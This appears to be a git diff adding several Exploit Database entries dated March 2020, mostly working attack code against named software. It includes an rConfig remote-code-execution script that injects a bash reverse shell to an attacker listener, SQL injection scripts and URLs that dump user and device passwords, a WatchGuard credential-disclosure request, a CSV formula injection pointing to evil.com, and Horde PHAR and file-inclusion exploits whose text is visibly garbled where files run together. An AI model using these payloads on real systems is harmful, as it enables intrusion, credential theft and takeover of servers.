diff --git a/exploits/java/webapps/48203.txt b/exploits/java/webapps/48203.txt
new file mode 100644
index 000000000..6f6a0f981
--- /dev/null
+++ b/exploits/java/webapps/48203.txt
@@ -0,0 +1,168 @@
+# Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure
+# Author: RedTeam Pentesting GmbH
+# Date: 2020-03-11
+# Vendor: https://www.watchguard.com
+# Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
+# CVE: N/A
+
+Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component
+
+RedTeam Pentesting discovered a credential-disclosure vulnerability in
+the AD Helper component of the WatchGuard Fireware Threat Detection and
+Response (TDR) service, which allows unauthenticated attackers to gain
+Active Directory credentials for a Windows domain in plaintext.
+
+
+Details
+=======
+
+Product: WatchGuard Fireware AD Helper Component
+Affected Versions: 5.8.5.10233, < 5.8.5.10317
+Fixed Versions: 5.8.5.10317
+Vulnerability Type: Information Disclosure
+Security Risk: high
+Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
+Advisory Status: published
+CVE: GENERIC-MAP-NOMATCH
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
+
+
+Introduction
+============
+
+"Threat Detection and Response (TDR) is a cloud-based subscription
+service that integrates with your Firebox to minimize the consequences
+of data breaches and penetrations through early detection and automated
+remediation of security threats."
+
+"Threat Detection and Response includes the AD Helper component. If your
+network has an Active Directory server, you can install AD Helper to
+manage automated installation and updates of Host Sensors on your
+network."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+By accessing the AD Helper's web interface, it was discovered that a
+call to an API endpoint is made, which responds with plaintext
+credentials to all configured domain controllers. There is no
+authentication needed to use the described interface and the
+installation instructions at [1] contain no indication of any way to
+configure access control.
+
+
+Proof of Concept
+================
+
+An HTTP GET request to the path "/domains/list" of the AD Helper
+API returns, among others, the plaintext credentials to
+all configured Windows domain controllers:
+
+------------------------------------------------------------------------
+$ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq .
+
+{
+ "content": [
+ {
+ "id": 1,
+ "fullyQualifiedName": "example.com",
+ "logonDomain": "example.com",
+ "domainControllers": "dc1.example.com",
+ "username": "[DOMAIN_USER]",
+ "password": "[DOMAIN_PASSWORD]",
+ "uuid": "[...]",
+ "servers": [
+ {
+ [...]
+ }
+ ]
+ }
+ ],
+ "totalPages": 1,
+ "totalElements": 1,
+ "number": 0,
+ "numberOfElements": 1
+}
+------------------------------------------------------------------------
+
+The same request and its response can be observed when initially accessing
+the web interface. The discovered version of AD Helper responds with
+the following server banner:
+
+------------------------------------------------------------------------
+jetty(winstone-5.8.5.10233-9.4.12.v20180830)
+------------------------------------------------------------------------
+
+It is likely that other versions of the AD Helper Component are
+vulnerable as well.
+
+
+Workaround
+==========
+
+Ensure API of the AD Helper Component is not reachable over the network,
+for example by putting it behind a Firewall.
+
+
+Fix
+===
+
+Update to Version 5.8.5.10317 or later.
+
+
+Security Risk
+=============
+
+No authentication is needed to access AD Helper's web interface and the
+installation instructions at [1] describe that configured domain user
+accounts must possess at least the following privileges:
+
+ * Connect to the host
+ * Mount the share ADMIN$
+ * Create a file on the host
+ * Execute commands on the host
+ * Install software on the host
+
+Access to the "ADMIN$" share implies a user with administrative
+privileges. Therefore, this vulnerability poses a high risk.
+
+
+Timeline
+========
+
+2020-02-12 Vulnerability identified
+2020-02-19 Customer approved disclosure to vendor
+2020-02-24 Tried to contact the German branch of WatchGuard
+2020-02-27 Contacted the Dutch branch of WatchGuard
+2020-02-28 Contact to ADHelper QA Team Lead established
+2020-03-02 Advisory draft sent for verification
+2020-03-10 Vendor released fixed version and blog post
+2020-03-11 CVE ID requested
+2020-03-11 Advisory released
+
+
+References
+==========
+
+[1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
\ No newline at end of file
diff --git a/exploits/php/webapps/48202.txt b/exploits/php/webapps/48202.txt
new file mode 100644
index 000000000..3a7b5b75f
--- /dev/null
+++ b/exploits/php/webapps/48202.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection
+# Date: 2020-03-10
+# Author: Milad Karimi
+# Software Link:
+# Version:
+# Category : webapps
+# Tested on: windows 10 , firefox
+# CVE : CWE-89
+# Dork: inurl:index.php?option=com_newsfeeds
+
+
+index.php?option=com_newsfeeds&view=categories&feedid=[sqli]
+
+Example:
+
+http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
\ No newline at end of file
diff --git a/exploits/php/webapps/48204.txt b/exploits/php/webapps/48204.txt
new file mode 100644
index 000000000..d3c7f4d96
--- /dev/null
+++ b/exploits/php/webapps/48204.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
+# Google Dork: N/A
+# Date: 2020-03-05
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: https://www.codepeople.net/
+# Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip
+# Version: 1.3.34
+# Tested on: Windows 7 x86 SP1
+# CVE : CVE-2020-9371, CVE-2020-9372
+
+----Stored Cross-Site-Scripting-------------------
+
+1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php
+2) Calendar Name= and Update
+3) Click in any of the other tabs
+
+----CSV injection---------------------------------
+
+1) First we create a new calendar (Pages, add new, booking calendar) and Publish it (we can now log out)
+2) Then we go to the page and introduce data, and the payload:
+
+New booking:
+
+Name: IMPORTANT DATA
+Description: http://evil.com/evil.php
+
+New booking:
+
+Name: test
+Description: =HYPERLINK(K2;H2)
+
+This is the way it would work if i had a business registered and the payment was completed it can also be done by adding the new bookings with the same data from the admin panel
+
+3) Then we go to Bookings List and export the CSV file
+4) After that we open the file, and import data from an external file, using comma as separator
+5) Hyperlink to malicious PHP file is inserted and the user clicks on it, user is redirected to a fake login page (for example)
+
+Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016
\ No newline at end of file
diff --git a/exploits/php/webapps/48205.txt b/exploits/php/webapps/48205.txt
new file mode 100644
index 000000000..03b2b883e
--- /dev/null
+++ b/exploits/php/webapps/48205.txt
@@ -0,0 +1,51 @@
+# Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
+# Date: 2020-03-11
+# Exploit Author: Ismail Akıcı
+# Vendor Homepage: http://hrsale.com/
+# Software Link : http://demo.hrsale.com/
+# Software : HRSALE v1.1.8
+# Product Version: v1.1.8
+# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
+# Vulnerability : Cross-Site Request Forgery
+
+# Description :
+# CSRF vulnerability was discovered in v1.1.8 version of HRSALE.
+# With this vulnerability, authorized users can be added to the system.
+
+HTML CSRF PoC :
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/48207.py b/exploits/php/webapps/48207.py
new file mode 100755
index 000000000..284233dc4
--- /dev/null
+++ b/exploits/php/webapps/48207.py
@@ -0,0 +1,50 @@
+# Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
+# Date: 2020-03-08
+# Exploit Author: Engin Demirbilek
+# Vendor Homepage: https://www.rconfig.com/
+# Version: rConfig <= 3.94
+# Tested on: centOS
+# CVE: CVE-2020-10221
+# Advisory link: https://engindemirbilek.github.io/rconfig-3.93-rce
+
+import requests
+import sys
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+if len(sys.argv) < 6:
+ print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
+ exit()
+
+url = sys.argv[1]
+user = sys.argv[2]
+password = sys.argv[3]
+payload = ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(sys.argv[4], sys.argv[5])
+
+login = {
+ 'user':user,
+ 'pass':password,
+ 'sublogin':'1'
+}
+req = requests.Session()
+print "Sendin login request ..."
+login = req.post(url+"/lib/crud/userprocess.php", data=login, verify=False)
+
+payload = {
+ 'fileName':payload,
+}
+
+
+
+print "[+] Sendin exploit ..."
+
+exploit = req.post(url+"/lib/ajaxHandlers/ajaxAddTemplate.php",cookies=req.cookies, data=payload, headers={
+'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
+'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+'Accept-Encoding':'gzip, deflate',
+'Content-Type':'application/x-www-form-urlencoded'},verify=False)
+
+if exploit.status_code == 200:
+ print "[+] Everything seems ok, check your listener."
+else:
+ print "[-] Exploit failed, system is patched or credentials are wrong."
\ No newline at end of file
diff --git a/exploits/php/webapps/48208.py b/exploits/php/webapps/48208.py
new file mode 100755
index 000000000..7e7d652c6
--- /dev/null
+++ b/exploits/php/webapps/48208.py
@@ -0,0 +1,107 @@
+# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection
+# Exploit Author: vikingfr
+# Date: 2020-03-03
+# CVE-2020-10220
+# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
+# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
+# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip
+# Install scripts :
+# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
+# https://www.rconfig.com/downloads/scripts/centos7_install.sh
+# https://www.rconfig.com/downloads/scripts/centos6_install.sh
+# Version: tested v3.9.4
+# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
+#
+# Notes : If you want to reproduce in your lab environment follow those links :
+# http://help.rconfig.com/gettingstarted/installation
+# then
+# http://help.rconfig.com/gettingstarted/postinstall
+#
+# $ python3 rconfig_sqli.py https://1.1.1.1
+# rconfig 3.9 - SQL Injection PoC
+# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php
+# [+] Extracting the current DB name :
+# rconfig2
+# [+] Extracting 10 first users :
+# admin:1:63a9f0ea7bb98050796b649e85481845
+# Maybe no more information ?
+# Maybe no more information ?
+# [snip]
+# [+] Extracting 10 first devices :
+# 127-0-0-1:127.0.0.1::ocdvulnpass:
+# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret
+# Maybe no more information ?
+# Maybe no more information ?
+# [snip]
+# Done
+
+
+#!/usr/bin/python3
+import requests
+import sys
+import urllib.parse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+print ("rconfig 3.9 - SQL Injection PoC")
+if len(sys.argv) != 2:
+ print ("[+] Usage : ./rconfig_exploit.py https://target")
+ exit()
+
+vuln_page="/commands.inc.php"
+vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
+given_target = sys.argv[1]
+target = given_target
+target += vuln_page
+target += vuln_parameters
+
+request = requests.session()
+dashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)
+
+
+def extractDBinfos(myTarget=None,myPayload=None):
+ """
+ Extract information from database
+ Args:
+ - target+payload (String)
+ Returns:
+ - payload result (String)
+ """
+ result = ""
+ encoded_request = myTarget+myPayload
+ exploit_req = request.get(encoded_request)
+ if '[PWN]' in str(exploit_req.content):
+ result = str(exploit_req.content).split('[PWN]')[1]
+ else:
+ result="Maybe no more information ?"
+
+ return result
+
+
+if dashboard_request.status_code != 404:
+ print ("[+] Triggering the payloads on "+given_target+vuln_page)
+ # get the db name
+ print ("[+] Extracting the current DB name :")
+ db_payload = "%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
+ db_name = extractDBinfos(target,db_payload)
+ print (db_name)
+ # DB extract users
+ print ("[+] Extracting 10 first users :")
+ for i in range (0, 10):
+ user1_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".users+limit+"+str(i)+","+str(i+1)+"),NULL--"
+ user_h = extractDBinfos(target,user1_payload)
+ #print ("[+] Dump device "+str(i))
+ print (user_h)
+ # DB extract devices information
+ print ("[+] Extracting 10 first devices :")
+ for i in range (0, 10):
+ device_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".nodes+limit+"+str(i)+","+str(i+1)+"),NULL--"
+ device_h = extractDBinfos(target,device_payload)
+ #print ("[+] Dump device "+str(i))
+ print (device_h)
+
+ print ("Done")
+
+else:
+ print ("[-] Please verify the URI")
+ exit()
\ No newline at end of file
diff --git a/exploits/php/webapps/48209.py b/exploits/php/webapps/48209.py
new file mode 100755
index 000000000..704830834
--- /dev/null
+++ b/exploits/php/webapps/48209.py
@@ -0,0 +1,166 @@
+## exploit-inc-inclusion.py
+#!/usr/bin/env python3
+from horde import Horde
+import subprocess
+import sys
+
+TEMP_DIR = '/tmp'
+
+if len(sys.argv) < 5:
+ print('Usage: ')
+ sys.exit(1)
+
+base_url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+filename = sys.argv[4]
+php_code = sys.argv[5]
+
+# log into the web application
+horde = Horde(base_url, username, password)
+
+# upload (delete manually) and evaluate the .inc file
+horde.upload_to_tmp('{}.inc'.format(filename), ' ')
+ sys.exit(1)
+
+base_url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+filename = sys.argv[4]
+php_code = sys.argv[5]
+
+source = '{}/{}.phar'.format(TEMP_DIR, filename)
+destination = '{}/static/{}.php'.format(WWW_ROOT, filename) # destination (delete manually)
+temp = 'temp.phar'
+url = '{}/static/{}.php'.format(base_url, filename)
+
+# log into the web application
+horde = Horde(base_url, username, password)
+
+# create a PHAR that performs a rename when loaded and runs the payload when executed
+subprocess.run([
+ 'php', 'create-renaming-phar.php',
+ temp, source, destination, php_code
+], stderr=subprocess.DEVNULL)
+
+# upload the PHAR
+with open(temp, 'rb') as fs:
+ phar_data = fs.read()
+ horde.upload_to_tmp('{}.phar'.format(filename), phar_data)
+
+# load the phar thus triggering the rename
+horde.trigger_phar(source)
+
+# issue a request to trigger the payload
+response = requests.get(url)
+print(response.text)
+## exploit-phar-loading.py EOF
+
+
+
+
+## create-renaming-phar.php
+#!/usr/bin/env php
+_lockfile, $this->_params['filename']) if $this->_locked
+class Horde_Auth_Passwd {
+ // visibility must match since protected members are prefixed by "\x00*\x00"
+ protected $_locked;
+ protected $_params;
+
+ function __construct($source, $destination) {
+ $this->_params = array('filename' => $destination);
+ $this->_locked = true;
+ $this->_lockfile = $source;
+ }
+};
+
+function createPhar($path, $source, $destination, $stub) {
+ // create the object and specify source and destination files
+ $object = new Horde_Auth_Passwd($source, $destination);
+
+ // create the PHAR
+ $phar = new Phar($path);
+ $phar->startBuffering();
+ $phar->addFromString('x', '');
+ $phar->setStub("setMetadata($object);
+ $phar->stopBuffering();
+}
+
+function main() {
+ global $argc, $argv;
+
+ // check arguments
+ if ($argc != 5) {
+ fwrite(STDERR, "Usage: \n");
+ exit(1);
+ }
+
+ // create a fresh new phar
+ $path = $argv[1];
+ $source = $argv[2];
+ $destination = $argv[3];
+ $stub = $argv[4];
+ @unlink($path);
+ createPhar($path, $source, $destination, $stub);
+}
+
+main();
+## create-renaming-phar.php EOF
+
+
+## horde.py
+import re
+import requests
+
+class Horde():
+ def __init__(self, base_url, username, password):
+ self.base_url = base_url
+ self.username = username
+ self.password = password
+ self.session = requests.session()
+ self.token = None
+ self._login()
+
+ def _login(self):
+ url = '{}/login.php'.format(self.base_url)
+ data = {
+ 'login_post': 1,
+ 'horde_user': self.username,
+ 'horde_pass': self.password
+ }
+ response = self.session.post(url, data=data)
+ token_match = re.search(r'"TOKEN":"([^"]+)"', response.text)
+ assert (
+ len(response.history) == 1 and
+ response.history[0].status_code == 302 and
+ response.history[0].headers['location'] == '/services/portal/' and
+ token_match
+ ), 'Cannot log in'
+ self.token = token_match.group(1)
+
+ def upload_to_tmp(self, filename, data):
+ url = '{}/turba/add.php'.format(self.base_url)
+ files = {
+ 'object[photo][img][file]': (None, filename),
+ 'object[photo][new]': ('x', data)
+ }
+ response = self.session.post(url, files=files)
+ assert response.status_code == 200, 'Cannot upload the file to tmp'
+
+ def include_remote_inc_file(self, path):
+ # vulnerable block (alternatively 'trean:trean_Block_Mostclicked')
+ app = 'trean:trean_Block_Bookmarks'
+
+ # add one dummy bookmark (to be sure)
+ url = '{}/trean/add.php'.format(self.base_url)
+ data = {
+ 'actionID': 'add_bookmark',
+ 'url': 'x'
+ }
+ response = self.session.post(url, data=data)
+ assert response.status_code == 200, 'Cannot add the bookmark'
+
+ # add bookmark block
+ url = '{}/services/portal/edit.php'.format(self.base_url)
+ data = {
+ 'token': self.token,
+ 'row': 0,
+ 'col': 0,
+ 'action': 'save-resume',
+ 'app': app,
+ }
+ response = self.session.post(url, data=data)
+ assert response.status_code == 200, 'Cannot add the bookmark block'
+
+ # edit bookmark block
+ url = '{}/services/portal/edit.php'.format(self.base_url)
+ data = {
+ 'token': self.token,
+ 'row': 0,
+ 'col': 0,
+ 'action': 'save',
+ 'app': app,
+ 'params[template]': '../../../../../../../../../../../' + path
+ }
+ response = self.session.post(url, data=data)
+ assert response.status_code == 200, 'Cannot edit the bookmark block'
+
+ # evaluate the remote file
+ url = '{}/services/portal/'.format(self.base_url)
+ response = self.session.get(url)
+ print(response.text)
+
+ # remove the bookmark block so to not break the page
+ url = '{}/services/portal/edit.php'.format(self.base_url)
+ data = {
+ # XXX token not needed here
+ 'row': 0,
+ 'col': 0,
+ 'action': 'removeBlock'
+ }
+ response = self.session.post(url, data=data)
+ assert response.status_code == 200, 'Cannot reset the bookmark block'
+
+ def trigger_phar(self, path):
+ # vulnerable block (alternatively the same can be obtained by creating a
+ # bookmark with the PHAR path and clocking on it)
+ app = 'horde:horde_Block_Feed'
+
+ # add syndicated feed block
+ url = '{}/services/portal/edit.php'.format(self.base_url)
+ data = {
+ 'token': self.token,
+ 'row': 0,
+ 'col': 0,
+ 'action': 'save-resume',
+ 'app': app,
+ }
+ response = self.session.post(url, data=data)
+ assert response.status_code == 200, 'Cannot add the syndicated feed block'
+
+ # edit syndicated feed block
+ url = '{}/services/portal/edit.php'.format(self.base_url)
+ data = {
+ 'token': self.token,
+ 'row': 0,
+ 'col': 0,
+ 'action': 'save',
+ 'app': app,
+ 'params[uri]': 'phar://{}'.format(path)
+ }
+ response = self.session.post(url, data=data)
+ assert response.status_code == 200, 'Cannot edit the syndicated feed block'
+
+ # load the PHAR archive
+ url = '{}/services/portal/'.format(self.base_url)
+ response = self.session.get(url)
+
+ # remove the syndicated feed block so to not break the page
+ url = '{}/services/portal/edit.php'.format(self.base_url)
+ data = {
+ # XXX token not needed here
+ 'row': 0,
+ 'col': 0,
+ 'action': 'removeBlock'
+ }
+ response = self.session.post(url, data=data)
+ assert response.status_code == 200, 'Cannot reset the syndicated feed block'
+## horde.py EOF
\ No newline at end of file
diff --git a/exploits/windows/local/48206.txt b/exploits/windows/local/48206.txt
new file mode 100644
index 000000000..d07245513
--- /dev/null
+++ b/exploits/windows/local/48206.txt
@@ -0,0 +1,34 @@
+# Exploit Title: ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-03-11
+# Vendor Homepage: https://www.asus.com/
+# Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3_Win10_H97M-Pro_V10102.zip?_ga=2.170180192.1334401606.1583873755-790266082.1583873755
+# Tested Version: 1.00.22
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Home x64 en
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "asHmComSvc" | findstr /i /v """
+ASUS HM Com Service asHmComSvc C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe Auto
+
+C:\>sc qc asHmComSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: asHmComSvc
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : ASUS HM Com Service
+ DEPENDENCIES : RpcSs
+ SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path
+# undetected by the OS or other security applications where it could potentially be executed during
+# application startup or reboot. If successful, the local user's code would execute with the elevated
+# privileges of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7d5523f4f..2a3d45dac 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10988,6 +10988,7 @@ id,file,description,date,author,type,platform,port
48185,exploits/linux/local/48185.rb,"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)",2020-03-09,Metasploit,local,linux,
48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,
48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,
+48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42457,3 +42458,11 @@ id,file,description,date,author,type,platform,port
48189,exploits/php/webapps/48189.txt,"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting",2020-03-10,En_dust,webapps,php,
48190,exploits/php/webapps/48190.txt,"Persian VIP Download Script 1.0 - 'active' SQL Injection",2020-03-10,S3FFR,webapps,php,
48197,exploits/php/webapps/48197.txt,"Wordpress Plugin Search Meter 2.13.2 - CSV injection",2020-03-11,"Daniel Monzón",webapps,php,
+48202,exploits/php/webapps/48202.txt,"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection",2020-03-12,"Milad karimi",webapps,php,
+48203,exploits/java/webapps/48203.txt,"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure",2020-03-12,"RedTeam Pentesting GmbH",webapps,java,
+48204,exploits/php/webapps/48204.txt,"Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php,
+48205,exploits/php/webapps/48205.txt,"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)",2020-03-12,"Ismail Akıcı",webapps,php,
+48207,exploits/php/webapps/48207.py,"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution",2020-03-12,"Engin Demirbilek",webapps,php,
+48208,exploits/php/webapps/48208.py,"rConfig 3.9 - 'searchColumn' SQL Injection",2020-03-12,vikingfr,webapps,php,
+48209,exploits/php/webapps/48209.py,"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion",2020-03-11,"Andrea Cardaci",webapps,php,
+48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php,